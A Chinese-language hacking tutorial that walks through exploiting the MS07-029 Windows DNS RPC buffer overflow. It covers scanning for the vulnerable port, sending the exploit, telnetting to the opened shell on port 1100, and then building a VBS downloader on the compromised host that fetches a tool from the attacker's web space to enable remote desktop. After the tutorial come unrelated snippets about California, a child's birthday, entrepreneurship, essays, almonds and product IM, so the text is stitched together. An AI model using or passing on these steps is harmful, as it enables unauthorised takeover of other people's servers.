前言:
MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。
今天,就让我带领各路英豪,踏上DNS EXP之路。
我们先来看看所用工具的界面:
这就是传说中的利用工具,可以通杀2000SEVER,2003SEVER系统,另外还具备了扫描功能!
先用它来对主机进行扫描:
在我们的命令行下输入:“dns –s 目标IP地址”
稍等片刻,开放的端口以及操作系统以出现在我们面前,如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你,你马上就会成功得到这台主机的权限了
上图意思就是1029端口存在漏洞。
现在我们来最关键的步骤――溢出:
在命令行内输入
dns -2003chs *.*.93.189 1029
其中-2003ch的意思是操作系统的型号,-2003chs即简体中文版的2003系统,
如果是2000的系统就使用“-2000all”参数,*.*.93.189就是我们的目标IP地址,1029就是刚才扫描出存在漏洞的端口”。
出现“Attack sent ,check port 1100”字样,说明已经打开了目标地址的1100端口,我们TELNET上去:TELNET *.*.93.189 1100
我们现在已经成功的入侵了对方的电脑,并且得到了管理员的权限。
下面我给大家介绍一下如何在肉鸡上面开3389,
在命令行里输入
@echo with wscript:if .arguments.count^ tony.vbs
@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >>tony.vbs
@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:" web.status:.quit >>tony.vbs
@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >>tony.vbs
大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs
然后把开3389的工具上传到你的个人空间,
我这里用的是火狐开3389的工具,在命令行里输入 cscript tony.vbs http://你空间地址/wrsky.exe c:\wrsky.exe
加利福尼亚州,美国西部最富盛名的州,好莱坞的大本营,它的名字取自西班牙传说中的小岛名称,浪漫又朝气蓬勃,是光听到名字就会让人怦然心动的地方。 这里有迷人的海岸线 高耸的棕榈与蓝天白云...
一不小心你就三岁了。生日快乐,以前我的心愿就是等你长大,现在忽然发现你已长大还有点舍不得,不知不觉,孩子已经三岁了,虽然有时候很调皮,可是也很窝心,孩子妈妈爱你,希望你可以一直那么开心快乐。 宝宝三...
自主创业跟打工赚钱不一样,自主创业是给自己而干,由于自身资金投入了時间钱财,期盼获得收益。会很认真去做,害怕不成功。白手起家创业听起来很不简单,实际上在这里自主创业道上是很艰苦的,自主创业一定要坚持不...
以错误为话题的作文(以错误为话题的作文500字5篇) 初中生优秀作文:美丽的错误 篇一:美丽的错误 “一个人往往因为一点小小的错误,将来会变得更好”!这是莎士比亚说的话。 有这麽一...
杏仁有什么作用和功效(杏仁营养价值)杏仁引种于暖温带地区,它的营养价值很高,而杏仁研磨成粉后的的营养则更容易被胃肠道消化吸收。杏仁含有丰富的单不饱和脂肪酸,有益于心脏健康。此外,杏仁中含有维生素E等抗...
很长一段时间没有写文章了,最近负责商户端IM部分,自己也处在一个摸索阶段,写下最近一段时间的理解和感受,欢迎交流。产品经理对每块领域认知可能是不一样的,希望通过交流促进自身增长。 一、什么是商...